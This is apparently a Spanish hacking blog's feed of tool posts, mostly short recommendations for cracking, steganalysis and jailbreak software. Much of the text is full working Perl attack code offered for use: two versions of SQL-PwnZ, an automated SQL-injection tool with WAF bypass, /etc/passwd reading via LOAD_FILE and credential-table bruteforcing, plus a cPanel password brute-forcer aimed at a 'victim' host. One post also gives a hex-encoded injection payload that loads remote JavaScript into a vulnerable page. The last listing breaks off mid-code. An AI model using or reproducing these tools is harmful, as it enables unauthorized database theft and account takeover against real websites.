BrianUR » Toolz

Realizar ataques de fuerza bruta a volumenes TrueCrypt

Brian Urban — Mon, 18 Jul 2011 16:05:45 +0000

Antes que nada debo presentarles TrueCrypt para quienes no lo conozcan, es un Software que nos permite encriptar archivos haciendo uso de diferentes algoritmos de cifrado. Lo que más me gustó de este aplicativo es que nos permite crear volúmenes virtuales (como si se tratase de otro disco más en nuestro computador) que en realidad no es más que es un archivo con extensión .tc el cual después de poner la contraseña correcta se “monta” para poder ser usado y así es mucho más sencillo y rápido administrar los archivos del mismo.

En un reto que vi hace algún tiempo para un Wargame, había que realizar un ataque por diccionario a un volumen TrueCrypt y así fue que di con true.crypt.brute, que también puede ser útil en caso de olvidar la contraseña del .tc con archivos importantes. Eso si hay que tener en cuenta que se necesita un buen diccionario y que no es del todo efectivo el ataque, ya que como he visto en algunos casos de personas que usan 50 o más caracteres en su contraseña, haciendo imposible dar con ella usando un diccionario. Otro detalle es que el proceso es muy lento, hay que tener paciencia.

Descargar true.crypt.brute.

PHPCracker: Crackear diferentes tipos de hash con PHP

Brian Urban — Mon, 04 Jul 2011 11:43:16 +0000

Últimamente resolviendo algunos retos me ha tocado crackear diferentes hash y aunque existen muchos programas para esa labor (como Cain) estos no ofrecen soporte para realizar fuerza bruta a algunos tipos de hash. Por esta razón hice PHPCracker, un sencillo script que permite realizar ataques por fuerza bruta y ataques por diccionario usando PHP.

El script hace uso de la función hash de PHP, soportando más de 30 tipos de hash como md5, sha1, whirlpool y otros. De momento solo funciona el ataque con 4 caracteres, se pueden agregar más for manualmente para aumentar el número de caracteres pero no es la mejor opción… para la próxima versión prometo arreglar ese detalle utilizando recursividad.

Gracias a PHP, PHPCracker puede correr en diferentes plataformas como iOS o Android:

StegSecret: Herramienta para estegoanálisis

Brian Urban — Sat, 19 Mar 2011 20:15:02 +0000

StegSecret es una interesante herramienta para estegoanálisis de imágenes en busca de información oculta, comprobando diferentes tipos de técnicas comunes y patrones usados por programas como camouflage, inThePicture, inPlainView, steghide, dataStealth y entre otros más. Muy útil para wargames cuando necesitas saber rapidamente el tipo de tecnica de un reto de esteganografía antes de ponerte a comprobar manualmente.

Programas y técnicas detectadas

camouflage V1.2.1, inThePicture v2, JPEGXv2.1.1, PGE (Pretty Good Envelope) v1.0, appendX v<=4, steganography v1.6.5, inPlainView, DataStash v1.5 y dataStealth v1.0.
Programas basados en técnicas EOF (End Of File).
Suporta los formatos BMP, GIF y JPEG.
Cuenta con una Base de Datos de Aplicaciones Esteganográficas “bdas v0.1″ con más de 40 tipos de técnicas esteganográficas.

En resumen una herramienta que no puede faltar en el repertorio.

Sitio web y descarga de StegSecret.

Cain & Abel: Una herramienta todo en uno

Brian Urban — Tue, 14 Dec 2010 23:14:18 +0000

Cain & Abel es una de mis herramientas preferidas en entornos Windows, ya que dentro de una misma aplicación podemos hacer montones de cosas como recuperar contraseñas del sistema donde este instalado, entre ellas contraseñas Wi-Fi, de Internet Explorer, clientes de correo, Microsoft Access y más. También cuenta con sistema de crackeo de múltiples tipos hash, en el que permite usar técnicas como fuerza bruta, ataque por diccionario y ataque por criptoánalisis. Otra de sus características más valoradas es que permite sniffear redes, permitiendo obtener contraseñas en una red, grabar conversaciones VoIP, entre otras. Ademas cuenta con decodificador de Base64, VNC, Cisco VPN Client y otras pequeñas utilidades.

Descargar Cain & Abel también puedes descarga una versión portable.

El manual oficial lo puedes encontrar aquí o este otro en español.

CrypTool: Una herramienta para Criptografía y Criptoanálisis

Brian Urban — Sun, 24 Oct 2010 22:22:50 +0000

CrypTool es una de esas herramientas a las que uno les coge cariño rápidamente, yo la llevo usando hace algún buen tiempo para resolver retos de criptografía y me a funcionado de maravilla. Esta herramienta es usada para el aprendizaje de Criptografía y Criptoanálisis, lamentablemente solo esta disponible para Windows pero existe una alternativa llamada JCrypTool desarrollada en Java, con la posibilidad de ejecutarse en múltiples sistemas operativos.

Entre las caracterisitcas destacadas de CrypTool podemos encontrar:

Numerosos algoritmos criptográficos, clásicos y modernos (cifrado y descifrado, generación de clave, contraseñas seguras, autentificación, protocolos seguros, …)
Visualización de varios métodos (p.ej. César, Enigma, RSA, Diffie-Hellman, firmas digitales, AES)
Criptoanálisis de ciertos algoritmos (p.ej. Vigenère, RSA, AES)
Métodos de medida criptoanalítica (p.ej. entropía, n-grams, autocorrelación)
Métodos auxiliares (p.ej. tests de primalidad, factorización, codificación en base64)
Tutorial sobre teoría de números.
Ayuda detallada on-line.
Script con más información sobre criptografía.

Descargar CrypTool

SQL-PwnZ 1.5 – Herramienta para SQL Injection

Brian Urban — Wed, 14 Jul 2010 01:25:48 +0000

Algunos deben recordar que anteriormente les había hablado de esta tool. Hoy me encontré en la web de Login-Root que ya esta disponible la version 1.5.

Las novedades son:

[+] Agregado mod_security Bypass.
[+] Agregado Illegal Mix Of Collations Bypass.
[+] Agregadas más tablas para bruteforce.
[+] Agregadas más columnas para bruteforce.
[+] Código interno mejorado.
[+] Bugs Fixeados.

Pueden descargarla desde aquí.

#!/usr/bin/perl

##################################################################################################################
#                                  -[+]- SQL-PwnZ v1.5 | By Login-Root -[+]-                                   ###
##################################################################################################################

##################################################################################################################
# [+] inf0:                                                                                                    ###
##################################################################################################################
# Busca:                                                                                                       ###
# ======                                                                                                       ###
#  - Nº de columnas                                                                                            ###
#  - Information_Schema && MySQL.User                                                                          ###
#  - LOAD_FILE                                                                                                 ###
#  - Tablas                                                                                                    ###
#  - Columnas                                                                                                  ###
#  - Illegal Mix Of Collations Bypass && mod_security Bypass                                                   ###
#                                                                                                              ###
#  ...y guarda todo en un archivo de texto.                                                                    ###
#                                                                                                              ###
##################################################################################################################

##################################################################################################################
# [+] Use:                                                                                                     ###
##################################################################################################################
# perl sqlpwnz.pl [WEBSITE] [COLUMNAS] [ARCHIVO] [COMENTARIO] [-TB] [-CL] [-NOCHECK] [-MOD_FUCK] [-MIX_BYPASS] ###
#   [WEBSITE]: http://www.web.com/index.php?id=12 [INGRESAR UN ID VALIDO]                                      ###
#   [COLUMNAS]: Limite de columnas                                                                             ###
#   [ARCHIVO]: Archivo donde guardar web vulnerable                                                            ###
#   [COMENTARIO]: '/*' o '--' (Sin las comillas) (Opcional)                                                    ###
#   [-TB]: Intentar brutear tablas (Opcional)                                                                  ###
#   [-CL]: Intentar brutear columnas (Opcional)                                                                ###
#   [-NOCHECK]: No hacer el chequeo inicial (Opcional)                                                         ###
#   [-MOD_FUCK]: Activar mod_security Bypass (Opcional)                                                        ###
#   [-MIX_BYPASS]: Activar Illegal Mix Of Collations Bypass (Opcional)                                         ###
##################################################################################################################

##################################################################################################################
# [+] c0ntact:                                                                                                 ###
##################################################################################################################
# MSN:    no.more@passport.com                                                                                 ###
# E-Mail: login_root@yahoo.com.ar                                                                              ###
##################################################################################################################

##################################################################################################################
# [+] sh0utz:                                                                                                  ###
##################################################################################################################
# Greetz: KiKo ; VanHan ; [Dead] Knet ; Ricota ; InyeXion ; OxOnO ; Matt ; r0dr1 ; oceanik6 ; OzX ; yoyahack   ###
# VISIT: WWW.REMOTEEXECUTION.ORG | WWW.DIOSDELARED.COM                                                         ###
##################################################################################################################

use HTTP::Request;
use LWP::UserAgent;

if(!$ARGV[2])
	{
		 print "\n\n-[+]- SQL-PwnZ v1.5 | By Login-Root -[+]-\n=========================================";
		 print "\n\nUso: perl $0 [WEBSITE] [COLUMNAS] [ARCHIVO] [COMENTARIO] [-TB] [-CL] [-NOCHECK] [-MOD_FUCK] [-MIX_BYPASS]\n";
		 print "\n[WEBSITE]: http://www.web.com/index.php?id=12 [INGRESAR UN ID VALIDO]\n[COLUMNAS]: Limite de columnas\n[ARCHIVO]: Archivo donde guardar web vulnerable\n[COMENTARIO]: '/*' o '--' (Sin las comillas) (Opcional)\n[-TB]: Intentar brutear tablas (Opcional)\n[-CL]: Intentar brutear columnas (Opcional)\n[-NOCHECK]: No hacer el chequeo inicial (Opcional)\n[-MOD_FUCK]: Activar mod_security Bypass (Opcional)\n[-MIX_BYPASS]: Activar Illegal Mix Of Collations Bypass (Opcional)\n\n";
		 exit (0);
	}

@nombretabla=('admin','tblUsers','tblAdmin','user','users','username','usernames','usuario','web_users',
	  'name','names','nombre','nombres','usuarios','member','members','admin_table','usuaris','web_usuarios',
	  'miembro','miembros','membername','admins','administrator','sign','config','USUARIS','cms_operadores',
	  'administrators','passwd','password','passwords','pass','Pass','mpn_authors','author','musuario','mysql.user',
	  'user_names','foro','tAdmin','tadmin','user_password','user_passwords','user_name',
	  'member_password','mods','mod','moderators','moderator','user_email','jos_users','mb_user','host','apellido_nombre',
	  'user_emails','user_mail','user_mails','mail','emails','email','address','jos_usuarios','tutorial_user_auth',
	  'e-mail','emailaddress','correo','correos','phpbb_users','log','logins','login','tbl_usuarios','user_auth','login_radio',
	  'login','registers','register','usr','usrs','ps','pw','un','u_name','u_pass','tbl_admin','usuarios_head',
	  'tpassword','tPassword','u_password','nick','nicks','manager','managers','administrador','BG_CMS_Users',
	  'tUser','tUsers','administradores','clave','login_id','pwd','pas','sistema_id','foro_usuarios','cliente',
	  'sistema_usuario','sistema_password','contrasena','auth','key','senha','signin','dir_admin','alias','clientes',
	  'tb_admin','tb_administrator','tb_login','tb_logon','tb_members_tb_member','calendar_users','cursos',
      'tb_users','tb_user','tb_sys','sys','fazerlogon','logon','fazer','authorization','web_users','curso',
      'membros','utilizadores','staff','nuke_authors','accounts','account','accnts','signup','leads','lead',
      'associated','accnt','customers','customer','membres','administrateur','utilisateur','riacms_users',
      'tuser','tusers','utilisateurs','password','amministratore','god','God','authors','wp_users','tb_usuarios',
      'asociado','asociados','autores','membername','autor','autores','Users','Admin','Members','tb_usuario',
	  'Miembros','Usuario','Usuarios','ADMIN','USERS','USER','MEMBER','MEMBERS','USUARIO','USUARIOS','MIEMBROS','MIEMBRO');

@nombrecolumna=('admin_name','cla_adm','usu_adm','fazer','logon','fazerlogon','authorization','membros','utilizadores','sysadmin','email','senha',
          'username','name','user','user_name','user_username','uname','user_uname','usern','user_usern','un','user_un','mail','cliente',
          'usrnm','user_usrnm','usr','usernm','user_usernm','nm','user_nm','login','u_name','nombre','host','pws','cedula','userName','host_password','chave','alias','apellido_nombre','cliente_nombre','cliente_email','cliente_pass','cliente_user','cliente_usuario',
          'login_id','usr','sistema_id','author','user_login','admin_user','admin_pass','uh_usuario','uh_password','psw','host_username',
          'sistema_usuario','auth','key','usuarios_nombre','usuarios_nick','usuarios_password','user_clave',
		  'membername','nme','unme','psw','password','user_password','autores','pass_hash','hash','pass','correo','usuario_nombre','usuario_nick','usuario_password',
          'userpass','user_pass','upw','pword','user_pword','passwd','user_passwd','passw','user_passw','pwrd','user_pwrd','pwd','authors',
          'user_pwd','u_pass','clave','usuario','contrasena','pas','sistema_password','autor','upassword','web_password','web_username');

($host, $columnas, $savelist) = @ARGV;

$agent = LWP::UserAgent->new;
$agent->agent("Google Bot");

if ( $host   !~   /^http:/ )
  {
      $host = "http://" . $host;
  }

for ($numarg = 0 ;  $numarg <= $#ARGV ; $numarg++)
{
	$argumentos.= $ARGV[$numarg];
}

if ($argumentos =~ /-MIX_BYPASS/i)
{
	print "\n[+] MIX_BYPASS ACTIVADO";
	$hexin = "unhex(hex(";
	$hexend = "))";
}
if ($argumentos !~ /-MOD_FUCK/i)
{
if ($argumentos =~ /--/)
{
	$cmn= "+";
	$cfin="--";
	print "\n[+] Comentarios a utilizar: '--' & '+'";
}
else
{
	$cmn= "/**/";
	$cfin= "/*";
	print "\n[+] Comentarios a utilizar: '/*' & '/**/'";
}
}
else
{
	print "\n[+] MOD_FUCK ACTIVADO, se ignoran comentarios. Utilizando: '+'. Bypass: '/*!' & '*/'";
	$bypass = "+/*!";
	$cmn= "+";
	$cfin= "*/";
}

open(WEB,">>".$savelist) || die "\n\n[-] Imposible crear el archivo de texto\n";
if ($argumentos =~ /-NOCHECK/i)
  {
      print "\n[!] Se omite el chequeo inicial...\n";
      print WEB "[WEBSITE]:\n\n$host\n";
  }
else
  {
      print "\n[!] Chequeando si la web es vulnerable...\n";
      $sql = $agent->request(HTTP::Request->new(GET => $host.$bypass."+AND+1=char(97)=char(87)".$cmn."UNION".$cmn."SELECT".$cfin));
      $response = $sql->content();
      if($response=~ /mysql_fetch_/ || $response=~ /You have an error in your SQL syntax/ || $response =~ /tem um erro de sintaxe no seu SQL/ || $response =~ /mysql_num_rows/ || $response =~ /Division by zero in/ || $response =~ /error de sintaxis al final de la entrada/ || $response =~ /Unknown column/)
        {
            print "[+] Web vulnerable, continua el script...\n";
            print WEB "[WEBSITE]:\n\n$host\n";
        }
        else
          {
            print "[-] Website aparentemente no vulnerable a SQL Inyection, intentar con otro comentario o con -NOCHECK activado\n\n";
	    close(WEB);
            exit(0);
          }
  }
print "\n[!] Buscando columnas...\n";
for ($column = 1 ; $column <= $columnas ; $column ++)
{
	$UNION.=','.$column;
	$inyection.=','."0x6c6f67696e70776e7a";
    if ($column == 1)
      {
          print WEB "\n[COLUMNAS]:\n\n";
          $inyection = '';
          $UNION = '';
      }
    $sql = $agent->request(HTTP::Request->new(GET => $host.$bypass."+AND+1=char(97)=char(87)".$cmn."UNION".$cmn."SELECT".$cmn."0x6c6f67696e70776e7a".$inyection.$cfin));
    $response = $sql->content();
    if($response =~ /loginpwnz/)
      {
         print "[+] La web posee $column columnas\n\n";
         $sql=$host.$bypass."+AND+1=char(97)=char(87)".$cmn."UNION".$cmn."SELECT".$cmn."1".$UNION.$cfin;
         print "$sql\n";
         print WEB "$sql\n";
         print "\n[!] Chequeando si existe Information_Schema...";
         $sql = $agent->request(HTTP::Request->new(GET => $host.$bypass."+AND+1=char(97)=char(87)".$cmn."UNION".$cmn."SELECT".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."FROM".$cmn."information_schema.tables".$cfin));
         $response = $sql->content();
         if($response =~ /loginpwnz/)
         	{
         		print "\n[+] Information_Schema disponible...guardando en $savelist";
            $sql=$host.$bypass."+AND+1=char(97)=char(87)".$cmn."UNION".$cmn."SELECT".$cmn."1".$UNION.$cmn."FROM".$cmn."information_schema.tables".$cfin;
            print WEB "\n\n[INFORMATION_SCHEMA]:\n\n$sql\n";

         	}
         else
         	{
            	print "\n[-] Information_Schema no disponible";
         	}
         print "\n[!] Chequeando si existe MySQL.User...";
         $sql = $agent->request(HTTP::Request->new(GET => $host.$bypass."+AND+1=char(97)=char(87)".$cmn."UNION".$cmn."SELECT".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."FROM".$cmn."mysql.user".$cfin));
         $response = $sql->content();
         if($response =~ /loginpwnz/)
         	{
         		print "\n[+] MySQL.User disponible...guardando en $savelist";
         		$sql=$host.$bypass."+AND+1=char(97)=char(87)".$cmn."UNION".$cmn."SELECT".$cmn."1".$UNION.$cmn."FROM".$cmn."mysql.user".$cfin;
            	print WEB "\n\n[MYSQL.USER]:\n\n$sql\n";

         	}
         else
         	{
            	print "\n[-] MySQL.User no disponible";
         	}
	while ($loadcont < $column-1)
	   {
		$loadfile.=','.$hexin.'LOAD_FILE(0x2f6574632f706173737764)'.$hexend;
		$loadcont++;
	   }
	print "\n[!] Chequeando si es posible inyectar LOAD_FILE...";
	$sql = $agent->request(HTTP::Request->new(GET => $host.$bypass."+AND+1=char(97)=char(87)".$cmn."UNION".$cmn."SELECT".$cmn.$hexin."LOAD_FILE(0x2f6574632f706173737764)".$hexend.$loadfile.$cfin));
    $response = $sql->content();
    if($response =~ /root:x:/)
         	{
         		print "\n[+] LOAD_FILE disponible...guardando en $savelist";
         		print WEB "\n\n[LOAD_FILE]:\n\n$hexinLOAD_FILE(0x2f6574632f706173737764)$hexend => OK! (0x2f6574632f706173737764 => /etc/passwd)\n";
          }
         else
         	{
            	print "\n[-] LOAD_FILE no disponible";
         	}
	if ($argumentos =~ /-TB/i)
         	{
              print "\n\n[!] Bruteando tablas...";
              print WEB "\n\n[TABLAS]:\n\n";
              foreach $tabla(@nombretabla)
                {
                  chomp($tabla);
                  $sql = $agent->request(HTTP::Request->new(GET => $host.$bypass."+AND+1=char(97)=char(87)".$cmn."UNION".$cmn."SELECT".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."FROM".$cmn.$tabla.$cfin));
                  $response = $sql->content();
                  if($response =~ /loginpwnz/)
                    {
                        print "\n[+] La tabla $tabla esta disponible...guardando en $savelist";
                        $sql=$host.$bypass."+AND+1=char(97)=char(87)".$cmn."UNION".$cmn."SELECT".$cmn."1".$UNION.$cmn."FROM".$cmn.$tabla.$cfin;
                        print WEB "$sql\n";
                    }
                }
           	}
        if ($argumentos =~ /-CL/i)
          {
          	print "\n\n[!] Tabla a la cual brutear columnas: ";
            $tabla=;
            chomp($tabla);
            print WEB "\n\n[COLUMNAS EN $tabla]:\n\n";
            foreach $columna(@nombrecolumna)
            {
             chomp($columna);
             $sql = $agent->request(HTTP::Request->new(GET => $host.$bypass."+AND+1=char(97)=char(87)".$cmn."UNION".$cmn."SELECT".$cmn.$hexin."concat(0x6c6f67696e70776e7a,0x3a,$columna)".$hexend.$inyection.$cmn."FROM".$cmn.$tabla.$cfin));
             $response = $sql->content();
             if ($response =~ /loginpwnz/)
                  {
                      print "\n[+] La columna $columna esta disponible...guardando en $savelist";
                      print WEB "$hexin$columna$hexend\n";
                  }
            }
        }
        print WEB "\n\n\n[*EOF*]";
        print "\n\n[+] Todo salvado correctamente en $savelist\n\n";
        print "## c0ded by Login-Root | 2010 ##\n\n";
	close(WEB);
        exit (0);
      }
}
print "[-] Imposible encontrar numero de columnas, intentar con mas columnas\n\n";
print "## c0ded by Login-Root | 2010 ##\n\n";
close(WEB);
exit (0);

Cpanel Password Brute Forcer

Brian Urban — Tue, 13 Jul 2010 22:55:25 +0000

Aquí les dejo una herramienta, el nombre lo dice todo. Esta hecha en Perl:

#!/usr/bin/perl
# Cpanel Password Brute Forcer
# ----------------------------
#    (c)oded By Hessam-x
# Perl Version ( low speed )
# Oerginal Advisory :
# http://www.simorgh-ev.com/advisory/2006/cpanel-bruteforce-vule/
use IO::Socket;
use LWP::Simple;
use MIME::Base64;

$host     = $ARGV[0];
$user     = $ARGV[1];
$port     = $ARGV[2];
$list     = $ARGV[3];
$file     = $ARGV[4];
$url = "http://".$host.":".$port;
if(@ARGV < 3){
print q(
###############################################################
#               Cpanel Password Brute Force Tool              #
###############################################################
#     usage : cpanel.pl [HOST] [User] [PORT][list] [File]    #
#-------------------------------------------------------------#
#    [Host] : victim Host             (simorgh-ev.com)        #
#    [User] : User Name               (demo)                  #
#    [PORT] : Port of Cpanel          (2082)                  #
#[list] : File Of password list   (list.txt)              #
#    [File] : file for save password  (password.txt)          #
#                                                             #
###############################################################
#            (c)oded By Hessam-x / simorgh-ev.com             #
###############################################################
);exit;}

headx();

$numstart  = "-1";

sub headx() {
print q(
###############################################################
#              Cpanel Password Brute Force Tool               #
#            (c)oded By Hessam-x / simorgh-ev.com             #
###############################################################
);
open (PASSFILE, "<$list") || die "[-] Can't open the List of password file !";
@PASSWORDS = ;
close PASSFILE;
foreach my $P (@PASSWORDS) {
chomp $P;
$passwd = $P;
print "\n [~] Try Password : $passwd \n";
&brut;
};
}
sub brut() {
$authx = encode_base64($user.":".$passwd);
print $authx;
my $sock = IO::Socket::INET->new(Proto => "tcp",PeerAddr => "$host", PeerPort => "$port") || print "\n [-] Can not connect to the host";
print $sock "GET / HTTP/1.1\n";
print $sock "Authorization: Basic $authx\n";
print $sock "Connection: Close\n\n";
read  $sock, $answer, 128;
close($sock);

if ($answer =~ /Moved/) {
print "\n [~] PASSWORD FOUND : $passwd \n";
exit();
}
}

Realizar Jailbreak a Iphone, Ipad y Ipod Touch

Brian Urban — Thu, 06 May 2010 19:36:21 +0000

Desde hace algunos días se encuentra disponible Spirit, una herramienta que permite realizar Jailbreak con un solo click al Iphone, Ipad y Ipod Touch. Cuenta con versiones para Windows y Mac OS y entre las novedades que nos ofrece este programa podemos encontrar que permite realizar Jailbreak a dispositivos con Firmware versión 3.1.3 (Iphone y Ipod Touch) y versión 3.2 (Ipad). Funciona con Itunes 9.1, ya que como algunos sabrán blackra1n anteriormente presentaba problemas con esa versión y solo se podía usar aplicando un parche. Y la característica más importante para mi es que permite hacer un Jailbreak permanente (untethered), es decir que si apagamos el dispositivo no tendremos que conectarlo al PC para volverlo a ‘hackear’.

Pueden encontrar la descarga en su sitio oficial: Spirit.

PD: Si tienen problemas usando este programa, ejecútenlo en modo compatibilidad con Windows 98.

Tutorial de como usar Spirit para realizar el Jailbreak

Pinche aquí para ver el vídeo

General Injection Explorer 3.0

Brian Urban — Tue, 16 Feb 2010 20:07:18 +0000

Anteriormente publique SQL-PwnZ 1.1 una herramienta para realizar inyecciones SQL. La que les traigo hoy es más amigable y solo necesitan usar el navegador, se llama General Injection Explorer 3.0 y fue creada por PonyMagic.

[?] ¿Que es?
Básicamente es un explorador de bases de datos MySQL via SQLi, “incrustado” en la inyección.

[!] ¿Que tiene la versión 3.0?
[+] Codeado desde 0.
[+] Bypasseo de “illegal operation”, y limite de group_concat_max_len.
[+] Mejor manejo de CSS && DIVS.
[+] Peticiones realizadas con AJAX.
[+] Nueva forma de ver tablas, MUCHO mas ordenadas.

[?] ¿Como se usa?
En una SQLi, unís otro select y marcas las columnas ( id=-1 union select 1,2,3,4,5 )
En un valor que printee (que se muestre en la web), simplemente copias y pegas el código de la GIE.

(0x3c736372697074207372633d22687474703a2f2f7669727475782e636f6d2e61722f4749452f5f2e6a732220747970653d22746578742f6a617661736372697074223e3c2f7363726970743e)

Ejemplo:
Normal: tales.php?id=-1 union select 0,1,2,3,4,5,6,7,8,9–
Con GIE: tales.php?id=-1 union select 0,1,(0x3c736372697074207372633d22687474703a2f2f7669727475782e636f6d2e61722f4749452f5f2e6a7322207479
70653d22746578742f6a617661736372697074223e3c2f7363726970743e),3,4,5,6,7,8,9–

En el siguiente gif pueden ver como funciona:

SQL-PwnZ 1.1 – Herramienta para SQL Injection

Brian Urban — Tue, 17 Nov 2009 23:57:00 +0000

Comparto con uds una herramienta muy útil para realizar inyecciones SQL.

#!/usr/bin/perl

###########################################################################################

#                           -[+]- SQL-PwnZ v1.1 | By Login-Root -[+]-                   ###

###########################################################################################

###########################################################################################

# [+] inf0:                                                                             ###

###########################################################################################

# Busca:                                                                                ###

# ======                                                                                ###

#  - Nº de columnas                                                                     ###        

#  - Information_Schema && MySQL.User                                                   ###

#  - LOAD_FILE                                                                          ###

#  - Tablas                                                                             ###                                                

#  - Columnas                                                                           ###

#                                                                                       ###

#  ...y guarda todo en un archivo de texto.                                             ###

#                                                                                       ###

###########################################################################################

###########################################################################################

# [+] Use:                                                                              ###

###########################################################################################

# perl sqlpwnz.pl [WEBSITE] [COLUMNS] [FILE] [COMENTARIO] [-T] [-C] [-NOCHECK]          ###

#   [WEBSITE]: http://www.web.com/index.php?id=                                         ###

#   [COLUMNS]: Limite de columnas                                                       ###

#   [FILE]: Archivo donde guardar web vulnerable                                        ###

#   [COMENTARIO]: '/*' o '--' (Sin las comillas) (Opcional)                             ###

#   [-T]: Intentar brutear tablas (Opcional)                                            ###

#   [-C]: Intentar brutear columnas (Opcional)                                          ###

#   [-NOCHECK]: No hacer el chequeo inicial (Opcional)                                  ###

###########################################################################################

###########################################################################################

# [+] c0ntact:                                                                          ###

###########################################################################################

# MSN:    no.more@passport.com                                                          ###

# Jabber: login-root@x23.eu                                                             ### 

# E-Mail: login_root@yahoo.com.ar                                                       ###

###########################################################################################

###########################################################################################

# [+] sh0utz:                                                                           ###

###########################################################################################

# In memory of ka0x | Greetz: KSHA ; Psiconet ; Knet ; VenoM ; InyeXion ; N3xtdoor      ###

# Many thanks to boER, who teach me a little of perl ;D                                 ###

# VISIT: WWW.MITM.CL | WWW.REMOTEEXECUTION.ORG | WWW.DIOSDELARED.COM                    ###

###########################################################################################

use LWP::Simple;

if(!$ARGV[2])

	{

		 print "\n\n-[+]- SQL-PwnZ v1.1 | By Login-Root -[+]-\n=========================================";

		 print "\n\nUso: perl $0 [WEBSITE] [COLUMNS] [FILE] [COMENTARIO] [-T] [-C] [-NOCHECK]\n";

		 print "\n[WEBSITE]: http://www.web.com/index.php?id=\n[COLUMNS]: Limite de columnas\n[FILE]: Archivo donde guardar web vulnerable\n[COMENTARIO]: '/*' o '--' (Sin las comillas) (Opcional)\n[-T]: Intentar brutear tablas (Opcional)\n[-C]: Intentar brutear columnas (Opcional)\n[-NOCHECK]: No hacer el chequeo inicial (Opcional)\n\n";

		 exit (0);

	}

@nombretabla=('admin','tblUsers','tblAdmin','user','users','username','usernames','usuario',

	  'name','names','nombre','nombres','usuarios','member','members','admin_table',

	  'miembro','miembros','membername','admins','administrator',

	  'administrators','passwd','password','passwords','pass','Pass',

	  'tAdmin','tadmin','user_password','user_passwords','user_name','user_names',

	  'member_password','mods','mod','moderators','moderator','user_email',

	  'user_emails','user_mail','user_mails','mail','emails','email','address',

	  'e-mail','emailaddress','correo','correos','phpbb_users','log','logins',

	  'login','registers','register','usr','usrs','ps','pw','un','u_name','u_pass',

	  'tpassword','tPassword','u_password','nick','nicks','manager','managers','administrador',

	  'tUser','tUsers','administradores','clave','login_id','pwd','pas','sistema_id',

	  'sistema_usuario','sistema_password','contraseña','auth','key','senha',

	  'tb_admin','tb_administrator','tb_login','tb_logon','tb_members_tb_member',

      'tb_users','tb_user','tb_sys','sys','fazerlogon','logon','fazer','authorization',

      'membros','utilizadores','staff','nuke_authors','accounts','account','accnts',

      'associated','accnt','customers','customer','membres','administrateur','utilisateur',

      'tuser','tusers','utilisateurs','password','amministratore','god','God','authors',

      'asociado','asociados','autores','membername','autor','autores','Users','Admin','Members',

	  'Miembros','Usuario','Usuarios','ADMIN','USERS','USER','MEMBER','MEMBERS','USUARIO','USUARIOS','MIEMBROS','MIEMBRO');

@nombrecolumna=('admin_name','cla_adm','usu_adm','fazer','logon','fazerlogon','authorization','membros','utilizadores','sysadmin','email',

          'user_name','username','name','user','user_name','user_username','uname','user_uname','usern','user_usern','un','user_un','mail',

          'usrnm','user_usrnm','usr','usernm','user_usernm','nm','user_nm','login','u_name','nombre','login_id','usr','sistema_id','author',

          'sistema_usuario','auth','key','membername','nme','unme','psw','password','user_password','autores','pass_hash','hash','pass','correo',

          'userpass','user_pass','upw','pword','user_pword','passwd','user_passwd','passw','user_passw','pwrd','user_pwrd','pwd','authors',

          'user_pwd','u_pass','clave','usuario','contraseña','pas','sistema_password','autor','upassword','web_password','web_username');

if ( $ARGV[0]   !~   /^http:/ ) 

  {

      $ARGV[0] = "http://" . $ARGV[0];

  }

if ($ARGV[3] =~ "--" || $ARGV[4] =~ "--" || $ARGV[5] =~ "--" || $ARGV[6] =~ "--")

{

	$cmn.= "+";

	$cfin.="--";

	print "\n[+] Comentarios a utilizar: '--' & '+'";	

}

else

{

	$cmn.= "/**/";

	$cfin.= "/*";

	print "\n[+] Comentarios a utilizar: '/*' & '/**/'";

}

open(WEB,">>".$ARGV[2]) || die "\n\n[-] Imposible crear el archivo de texto\n";

if ($ARGV[3] =~ "-NOCHECK" || $ARGV[4] =~ "-NOCHECK" || $ARGV[5] =~ "-NOCHECK" || $ARGV[6] =~ "-NOCHECK")

  {

      print "\n[!] Se omite el chequeo inicial...\n";

      print WEB "[WEBSITE]:\n\n$ARGV[0]\n";

  }

else

  {

      print "\n[!] Chequeando si la web es vulnerable...\n";

      $sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cfin;

      $response=get($sql)or die("[-] Direccion web ingresada erroneamente, favor de reingresar de nuevo\n");

      if($response=~ /mysql_fetch_/ || $response=~ /You have an error in your SQL syntax/ || $response =~ /tem um erro de sintaxe no seu SQL/ ||         $response =~ /mysql_num_rows/ || $response =~ /Division by zero in/)

        {

            print "[+] Web vulnerable, continua el script...\n";

            print WEB "[WEBSITE]:\n\n$ARGV[0]\n";

        }

        else

          {

            print "[-] Website aparentemente no vulnerable a SQL Inyection, intentar con otro comentario\n\n";

            exit(1);

          }

  }

print "\n[!] Buscando columnas...\n";

for ($column = 0 ; $column < $ARGV[1] ; $column ++)

{

	$union.=','.$column;

	$inyection.=','."0x6c6f67696e70776e7a";

    if ($column == 0)

      {

          print WEB "\n[COLUMNAS]:\n\n";

          $inyection = '';

          $union = '';

      }

    $sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cfin;

    $response=get($sql)or die("[-] Error al intentar encontrar el numero de columnas, chequear website\n");

    if($response =~ /loginpwnz/)

      {

         $column ++;

         print "[+] La web posee $column columnas\n\n";

         $sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cfin;

         print "$sql\n";

         print WEB "$sql\n";

         print "\n[!] Chequeando si existe Information_Schema...";

         $sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."from".$cmn."information_schema.tables".$cfin;

         $response=get($sql)or die("[-] Imposible obtener Information_Schema\n");

         if($response =~ /loginpwnz/)

         	{

         		print "\n[+] Information_Schema disponible...guardando en $ARGV[2]";

            $sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".$cmn."information_schema.tables".$cfin;

            print WEB "\n\n[INFORMATION_SCHEMA]:\n\n$sql\n";

         	}

         else

         	{

            	print "\n[-] Information_Schema no disponible";

         	}

         print "\n[!] Chequeando si existe MySQL.User...";

         $sql=$ARGV[0]."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."from".$cmn."mysql.user".$cfin;

         $response=get($sql)or die("[-] Imposible obtener MySQL.User\n");

         if($response =~ /loginpwnz/)

         	{

         		print "\n[+] MySQL.User disponible...guardando en $ARGV[2]";

